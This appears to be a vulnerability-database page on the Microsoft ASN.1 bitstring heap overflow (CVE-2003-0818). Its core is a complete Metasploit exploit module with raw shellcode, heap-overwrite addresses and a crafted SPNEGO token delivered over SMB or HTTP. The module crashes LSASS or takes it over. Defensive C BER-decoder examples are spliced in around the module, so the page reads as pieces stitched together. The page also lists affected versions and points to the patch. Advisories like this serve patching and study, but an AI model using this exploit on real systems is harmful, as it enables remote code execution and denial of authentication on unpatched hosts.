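 * into constructed segments. Returns (size_t)-1 on any malformed element. */
static size_t ber_bitstring_bits(const uint8_t *buf, size_t len, int depth)
{
    size_t off = 0, total = 0;

    if (depth > MAX_NEST)
        return (size_t)-1;
    while (off < len) {
        uint8_t tag;
        size_t hdr, clen, sub;
        const uint8_t *body;

        if (!ber_read_header(buf + off, len - off, &tag, &hdr, &clen))
            return (size_t)-1;
        body = buf + off + hdr;
        if (tag == BER_BITSTRING) {
            /* body[0] = unused bits in the last octet: it must be present,
             * lie in 0..7, and be 0 when no data octets follow */
            if (clen == 0 || body[0] > 7 || (clen == 1 && body[0] != 0))
                return (size_t)-1;
            total += (clen - 1) * 8 - body[0];
        } else if (tag == BER_BITSTRING_CONSTR) {
            sub = ber_bitstring_bits(body, clen, depth + 1);
            if (sub == (size_t)-1)
                return (size_t)-1;
            total += sub;
        } else {
            return (size_t)-1;          /* not a BIT STRING element */
        }
        off += hdr + clen;
    }
    return total;
}

/* Validate one encoded BIT STRING: returns its bit count, or -1 to reject. */
static long check_bitstring(const uint8_t *buf, size_t len)
{
    size_t bits = ber_bitstring_bits(buf, len, 0);
    return bits == (size_t)-1 ? -1L : (long)bits;
}

/* Sample inputs, constructed for this example (not captured traffic). */
static const uint8_t sample_ok[]         = { 0x03, 0x03, 0x00, 0xA0, 0xB0 };
static const uint8_t sample_longform[]   = { 0x03, 0x81, 0x03, 0x00, 0xA0, 0xB0 };
static const uint8_t sample_constr[]     = { 0x23, 0x0A, 0x03, 0x03, 0x00, 0xA0, 0xB0,
                                             0x03, 0x03, 0x04, 0xC0, 0xD0 };
static const uint8_t sample_huge_len[]   = { 0x03, 0x82, 0xFF, 0xFF, 0x00 };  /* claims 65535 bytes */
static const uint8_t sample_wide_len[]   = { 0x03, 0x89, 0x01, 0, 0, 0, 0, 0, 0, 0, 0, 0x00 }; /* 9 length octets */
static const uint8_t sample_truncated[]  = { 0x03, 0x05, 0x00, 0xAA };
static const uint8_t sample_bad_unused[] = { 0x03, 0x02, 0x08, 0xFF };
static const uint8_t sample_empty_elem[] = { 0x23, 0x02, 0x03, 0x00 };       /* zero-length inner element */

int main(void)
{
    printf("primitive %ld, constructed %ld, huge length %ld, unused>7 %ld\n",
           check_bitstring(sample_ok, sizeof sample_ok),
           check_bitstring(sample_constr, sizeof sample_constr),
           check_bitstring(sample_huge_len, sizeof sample_huge_len),
           check_bitstring(sample_bad_unused, sizeof sample_bad_unused));
    return 0;
}
```

The two checks that matter are in ber_read_header: the long-form length is refused when it has more octets than size_t can represent, and the content length is compared against the bytes remaining rather than added to the header size first, so no attacker-chosen length can wrap the arithmetic. Everything downstream (the unused-bits octet, the recursion over constructed segments, the nesting cap) only ever indexes memory that this check has already accounted for.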

- Vulnerability details (F83044)

Microsoft ASN.1 Library Bitstring Heap Overflow (PacketStormID:F83044)
2009-11-26 00:00:00
Solar Eclipse  metasploit.com
exploit,vulnerability
windows
CVE-2003-0818
[Download]

This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch. You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp payloads, however a few problems were encountered when using the equivalent bind payloads. Your mileage may vary.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft ASN.1 Library Bitstring Heap Overflow',
			'Description'    => %q{
				This is an exploit for a previously undisclosed
				vulnerability in the bit string decoding code in the
				Microsoft ASN.1 library. This vulnerability is not related
				to the bit string vulnerability described in eEye advisory
				AD20040210-2. Both vulnerabilities were fixed in the
				MS04-007 patch.

				You are only allowed one attempt with this vulnerability. If
				the payload fails to execute, the LSASS system service will
				crash and the target system will automatically reboot itself
				in 60 seconds. If the payload succeeds, the system will no
				longer be able to process authentication requests, denying
				all attempts to login through SMB or at the console. A
				reboot is required to restore proper functioning of an
				exploited system.
				
				This exploit has been successfully tested with the win32/*/reverse_tcp
				payloads, however a few problems were encountered when using the
				equivalent bind payloads. Your mileage may vary.
					
			},
			'Author'         => [ 'Solar Eclipse <solareclipse@phreedom.org>' ],
			'License'        => GPL_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2003-0818'],
					[ 'OSVDB', '3902' ],
					[ 'BID', '9633'],
					[ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'],
					[ 'MSB', 'MS04-007'],

				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread'
				},				
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 
						'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)
						{
							'Platform' => 'win',
						},
					],
				],
			'DisclosureDate' => 'Feb 10 2004',
			'DefaultTarget' => 0))
			
		register_options(
			[
				OptString.new('PROTO', [ true,  "Which protocol to use: http or smb", 'smb']),
			], self.class)			
	end

	# This exploit is too destructive to use during automated exploitation.
	# Better Windows-based exploits exist at this time (Sep 2006)
	def autofilter
		false
	end

	# This is a straight port of Solar Eclipse's "kill-bill" exploit, published
	# as a Metasploit Framework module with his permission. This module is only
	# licensed under GPLv2, keep this in mind if you embed the Framework into
	# a non-GPL application. -hdm[at]metasploit.com

	def exploit
	
		# The first stage shellcode fixes the PEB pointer and cleans the heap
		stage0 = 
			"\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+
			"\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+
			"\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+
			"\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+
			"\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+
			"\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+
			"\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+
			"\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+
			"\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+
			"\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+
			"\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+
			"\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+
			"\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+
			"\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+
			"\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+
			"\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+
			"\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+
			"\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+
			"\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+
			"\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+
			"\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+
			"\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+
			"\x08\x00\xeb\xfe"

		token = spnego_token(stage0, payload.encoded)
		
		case datastore['PROTO']
			when 'smb'
				exploit_smb(token)
			when 'http'
				exploit_http(token)
			else
				print_status("Invalid application protocol specified, use smb or http")
		end
	end
	
	
	def exploit_smb(token)
		connect
		
		client = Rex::Proto::SMB::Client.new(sock)

		begin
			client.session_request(smb_hostname()) if not datastore['SMBDirect']
			client.negotiate
			client.session_setup_ntlmv2_blob(token)
		rescue => e
			if (e.to_s =~ /error code 0x00050001/)
				print_status("The target system has already been exploited")
			else
				print_status("Error: #{e}")
			end
		end
		
		handler
		disconnect
	end
	
	def exploit_http(token)
		connect
		
		req = "GET / HTTP/1.0\r\n"
		req << "Host: #{ datastore['RHOST']}\r\n"
		req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"

		sock.put(req)
		res = sock.get_once
		
		if (res and res =~ /0x80090301/)
			print_status("This server does not support the Negotiate protocol or has already been exploited")
		end
		
		if (res and res =~ /0x80090304/)
			print_status("This server responded with error code 0x80090304 (wth?)")
		end		
		
		handler
		disconnect
	end
	

	# Returns an ASN.1 encoded string
	def enc_asn1(str)
		Rex::Proto::SMB::Utils::asn1encode(str)
	end

	# Returns an ASN.1 encoded bit string with 0 unused bits
	def enc_bits(str)
		"\x03" + enc_asn1("\x00" + str)
	end

	# Returns a BER encoded constructed bit string
	def enc_constr(*str_arr)
		"\x23" + enc_asn1(str_arr.join(''))
	end

	# Returns a BER encoded SPNEGO token
	def spnego_token(stage0, stage1)
		
		if !(stage0 and stage1)
			print_status("Invalid parameters passed to spnego_token")
			return
		end
		
		if (stage0.length > 1032)
			print_status("The stage 0 shellcode is longer than 1032 bytes")
			return
		end
		
		tag = "\x90\x42\x90\x42\x90\x42\x90\x42"
		
		if ((tag.length + stage1.length) > 1033)
			print_status("The stage 1 shellcode is too long")
			return
		end
		
		
		# The first two overwrites must succeed, so we write to an unused location
		# in the PEB block. We don't care about the values, because after this the
		# doubly linked list of free blocks is corrupted and we get to the second
		# overwrite which is more useful.

		fw = "\xf8\x0f\x01\x00"		# 0x00010ff8
		bk = "\xf8\x0f\x01"
				
		# The second overwrite writes the address of our shellcode into the
		# FastPebLockRoutine pointer in the PEB

		peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB
			
		bitstring = enc_constr( 
			enc_bits("A" * 1024),
			"\x03\x00",
			enc_constr(
				enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))),
				enc_constr( enc_bits(fw + bk) ),
				enc_constr(
					enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))),
					enc_constr(
						enc_bits("\xeb\x06" + make_nops(6)),
						enc_bits("D" * 1040)
					)
				)
			)
		)
		
		token = "\x60" + enc_asn1(                 # Application Constructed Object
			"\x06\x06\x2b\x06\x01\x05\x05\x02" +   # SPNEGO OID
			"\xa0" + enc_asn1(					   # NegTokenInit (0xa0)
				"\x30" + enc_asn1(
					"\xa1" + enc_asn1(
						bitstring
					)
				)
			)
		)
		
		return token	
	end

end
    

- Vulnerability Information

3902
Microsoft Windows ASN.1 Library Integer Overflow
Location: Local Access Required, Remote / Network Access
Attack Type: Authentication Management, Input Manipulation, Race Condition
Impact: Loss of Integrity
Exploit Public, Exploit Commercial, Vendor Verified

- Vulnerability Description

A vulnerability exists in the ASN.1 protocol library used by the Windows operating system. This flaw allows a hostile BITSTRING ASN.1 sequence to overwrite sections of heap memory remotely, through any service that parses ASN.1 data. Examples of affected services include NetBIOS, SMB, IPSEC, Kerberos, SSL, and IIS. With a specially crafted request, an attacker can execute code with the privileges of the processing component, resulting in a loss of integrity.

- Timeline

2004-02-10 Unknown
2004-02-10 2004-02-10

- Solution

Microsoft has released a patch to address this vulnerability; there are currently no known workarounds.

- References

- Vulnerability Author

- Vulnerability Information

Microsoft Windows ASN.1 Library Bit String Processing Variant Heap Corruption Vulnerability
Class: Boundary Condition Error
Bugtraq ID: 13300
Remote: Yes
Local: No
Published: 2005-04-21 12:00:00
Updated: 2009-07-12 02:06:00
Discovery of this vulnerability has been credited to Solar Eclipse.

- Affected Program Versions

Yahoo! Messenger 5.6.0.1358
Yahoo! Messenger 5.6.0.1356
Yahoo! Messenger 5.6.0.1355
Yahoo! Messenger 5.6.0.1351
Yahoo! Messenger 5.6.0.1347
Yahoo! Messenger 5.6
Yahoo! Messenger 5.5.1249
Yahoo! Messenger 5.5
VanDyke SecureCRT 4.0.5
VanDyke SecureCRT 4.0.4
VanDyke SecureCRT 4.0.3
VanDyke SecureCRT 4.0.2
VanDyke SecureCRT 4.0.1
Musicmatch Inc. Musicmatch Jukebox 8.2
Musicmatch Inc. Musicmatch Jukebox 8.1
Musicmatch Inc. Musicmatch Jukebox 8.0
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows 98SE
Microsoft Windows 98
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
JASC Software PaintShop Pro 8.10
JASC Software PaintShop Pro 8.01
JASC Software PaintShop Pro 8.00
JASC Software PaintShop Pro 7.04
JASC Software PaintShop Pro 7.02
JASC Software PaintShop Pro 7.01
JASC Software PaintShop Pro 7.0
JASC Software PaintShop Pro 6.02
JASC Software PaintShop Pro 6.01
JASC Software PaintShop Pro 6.0
JASC Software PaintShop Pro 5.03
JASC Software PaintShop Pro 5.01
JASC Software PaintShop Pro 5.0
Intuit TurboTax 2003
Intuit Quicken 2003
AOL Instant Messenger 5.5.3415 Beta
AOL Instant Messenger 5.2.3292
AOL Instant Messenger 5.1.3036
AOL Instant Messenger 5.0.2938
Altova xmlspy Professional Edition 2004 R2
Altova xmlspy Professional Edition 2004
Altova xmlspy Home Edition 2004 R2
Altova xmlspy Home Edition 2004
Altova xmlspy Enterprise Edition 2004 R2
Altova xmlspy Enterprise Edition 2004
Adobe Acrobat 6.0
Adobe Acrobat 5.0.5
Adobe Acrobat 5.0

- Vulnerability Discussion

The Microsoft ASN.1 handling library has been reported prone to a heap corruption vulnerability. The issue presents itself in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function, and manifests when that function attempts to process a constructed bit string that contains another nested constructed bit string.

This vulnerability is exposed through a number of security-related operating system components, including Kerberos (UDP port 88), Microsoft IIS with SSL support enabled, and NTLMv2 authentication (TCP ports 135, 139 and 445). Other components may also be affected, though a comprehensive list is not available at this time. Client applications that use the library are also affected, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL). The vulnerable library is used frequently in components that handle certificates, such as Internet Explorer and Outlook; handling of signed ActiveX components could also present an exposure.

It should be noted that because ASN.1 data is usually carried inside another encoding layer (for example Kerberos, SSL, IPSec, or Base64 encoding), the malicious integer values may be obfuscated and, as a result, not easily detectable.
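As an added illustration of the decoding side that the discussion above describes, here is a small BER bit-string decoder in C. It is not code from this page, from the Metasploit module above, or from Microsoft's MSASN1 implementation. It accepts the two encodings the module's enc_bits and enc_constr helpers emit (primitive bit string, tag 0x03, and constructed bit string, tag 0x23), validates every length field against the bytes actually remaining before using it (the check whose absence is the "very large length fields" failure mode), bounds the recursion into nested constructed bit strings, and rejects a bit string that carries no unused-bits octet. The depth cap BER_MAX_DEPTH, the status codes, and the sample byte strings are assumptions chosen for the example, not values taken from the library.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Status codes; decode_bitstring() returns their negation on failure. */
enum ber_status {
    BER_OK = 0,
    BER_ERR_TRUNCATED,   /* length claims more bytes than the buffer holds */
    BER_ERR_BAD_LENGTH,  /* indefinite form, or more length octets than fit size_t */
    BER_ERR_BAD_TAG,     /* not a primitive (0x03) or constructed (0x23) bit string */
    BER_ERR_TOO_DEEP,    /* nesting deeper than BER_MAX_DEPTH */
    BER_ERR_BAD_UNUSED,  /* unused-bits octet missing or greater than 7 */
    BER_ERR_OUTPUT_FULL, /* caller's output buffer would overflow */
    BER_ERR_TRAILING     /* bytes left over after the outer TLV */
};

#define BER_MAX_DEPTH 4  /* assumed policy value for this example */

/* Read a BER length at buf[*pos] and advance *pos past it. The length is
   checked against the bytes remaining by comparison, never by adding it to
   an offset first, so an oversized field cannot wrap an index around. */
static enum ber_status ber_read_length(const uint8_t *buf, size_t len,
                                       size_t *pos, size_t *out)
{
    if (*pos >= len) return BER_ERR_TRUNCATED;
    uint8_t first = buf[(*pos)++];
    if (first < 0x80) {
        *out = first;                               /* short form */
    } else {
        size_t n = first & 0x7f;                    /* long form: n length octets */
        if (n == 0 || n > sizeof(size_t)) return BER_ERR_BAD_LENGTH;
        if (n > len - *pos) return BER_ERR_TRUNCATED;
        size_t v = 0;                               /* n <= sizeof(size_t): no overflow */
        for (size_t i = 0; i < n; i++) v = (v << 8) | buf[(*pos)++];
        *out = v;
    }
    if (*out > len - *pos) return BER_ERR_TRUNCATED;
    return BER_OK;
}

/* Decode one bit string TLV at buf[*pos], appending its payload octets (those
   after the unused-bits octet) to out. A constructed bit string is a sequence
   of bit strings, so it recurses, bounded by depth. */
static enum ber_status ber_decode_bits(const uint8_t *buf, size_t len, size_t *pos,
                                       int depth, uint8_t *out, size_t cap, size_t *n)
{
    if (depth > BER_MAX_DEPTH) return BER_ERR_TOO_DEEP;
    if (*pos >= len) return BER_ERR_TRUNCATED;
    uint8_t tag = buf[(*pos)++];
    size_t clen;
    enum ber_status st = ber_read_length(buf, len, pos, &clen);
    if (st != BER_OK) return st;
    size_t end = *pos + clen;        /* cannot wrap: clen <= len - *pos was proven */

    if (tag == 0x03) {               /* primitive: [unused-bits][payload...] */
        if (clen == 0 || buf[*pos] > 7) return BER_ERR_BAD_UNUSED;
        if (clen - 1 > cap - *n) return BER_ERR_OUTPUT_FULL;
        memcpy(out + *n, buf + *pos + 1, clen - 1);
        *n += clen - 1;
        *pos = end;
        return BER_OK;
    }
    if (tag == 0x23) {               /* constructed: children fill [*pos, end) */
        while (*pos < end) {
            st = ber_decode_bits(buf, end, pos, depth + 1, out, cap, n);
            if (st != BER_OK) return st;
        }
        return BER_OK;
    }
    return BER_ERR_BAD_TAG;
}

/* Decode a complete bit string held in buf; returns the payload byte count on
   success, or the negated ber_status on failure. */
long decode_bitstring(const uint8_t *buf, size_t len, uint8_t *out, size_t cap)
{
    size_t pos = 0, n = 0;
    enum ber_status st = ber_decode_bits(buf, len, &pos, 0, out, cap, &n);
    if (st == BER_OK && pos != len) st = BER_ERR_TRAILING;
    return st == BER_OK ? (long)n : -(long)st;
}

/* Constructed sample inputs for this example (not captured traffic). */
static const uint8_t SAMPLE_FLAT[]     = {0x03,0x03,0x00,'A','B'};
static const uint8_t SAMPLE_NESTED[]   = {0x23,0x0c,0x23,0x0a,0x03,0x03,0x00,'A','B',
                                          0x03,0x03,0x00,'C','D'};
static const uint8_t SAMPLE_HUGE[]     = {0x03,0x84,0xff,0xff,0xff,0xff,0x00}; /* 4 GiB claimed */
static const uint8_t SAMPLE_DEEP[]     = {0x23,0x0d,0x23,0x0b,0x23,0x09,0x23,0x07,
                                          0x23,0x05,0x23,0x03,0x03,0x01,0x00};
static const uint8_t SAMPLE_NOUNUSED[] = {0x23,0x02,0x03,0x00}; /* zero-length child */

/* 1 if buf decodes to exactly the payload string expect, else 0. */
int decodes_to(const uint8_t *buf, size_t len, const char *expect)
{
    uint8_t out[64];
    long n = decode_bitstring(buf, len, out, sizeof out);
    return n >= 0 && (size_t)n == strlen(expect) && memcmp(out, expect, (size_t)n) == 0;
}

/* Status-only wrapper for the rejection cases. */
long decode_status(const uint8_t *buf, size_t len)
{
    uint8_t out[64];
    return decode_bitstring(buf, len, out, sizeof out);
}

int main(void)
{
    printf("flat:        %s\n", decodes_to(SAMPLE_FLAT, sizeof SAMPLE_FLAT, "AB") ? "AB" : "rejected");
    printf("nested:      %s\n", decodes_to(SAMPLE_NESTED, sizeof SAMPLE_NESTED, "ABCD") ? "ABCD" : "rejected");
    printf("huge length: status %ld\n", decode_status(SAMPLE_HUGE, sizeof SAMPLE_HUGE));
    printf("too deep:    status %ld\n", decode_status(SAMPLE_DEEP, sizeof SAMPLE_DEEP));
    printf("no unused:   status %ld\n", decode_status(SAMPLE_NOUNUSED, sizeof SAMPLE_NOUNUSED));
    return 0;
}
```

The two properties a reviewer should look for in any BER decoder are visible here: the length is compared against `len - *pos` rather than added to a pointer and then compared (so a 32-bit or 64-bit wrap cannot pass the check), and a constructed bit string passes its own `end` down as the child's `len`, so no child can read past its parent even when every length field individually looks plausible.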

Issues related to this vulnerability were originally covered in BID 9626 and BID 9743. Further information has since become available identifying this as a distinct vulnerability in the library, so this specific issue has been assigned its own BID.

** June 5, 2005 Update: An IRC bot style tool may be exploiting this vulnerability. This alert will be updated as further information becomes available.

- Exploit

The following proof of concept exploits are available:

- Solution

Computers that have the patches associated with Microsoft security bulletin MS04-007 installed are reported not to be vulnerable to this issue. Symantec has confirmed this information.


Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows NT Server 4.0 SP6a
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows XP Professional
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows 2000 Professional SP2
Microsoft Windows Server 2003 Web Edition
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows XP Home
Microsoft Windows XP Home SP1
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows 2000 Server SP3
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition

- References

 

 
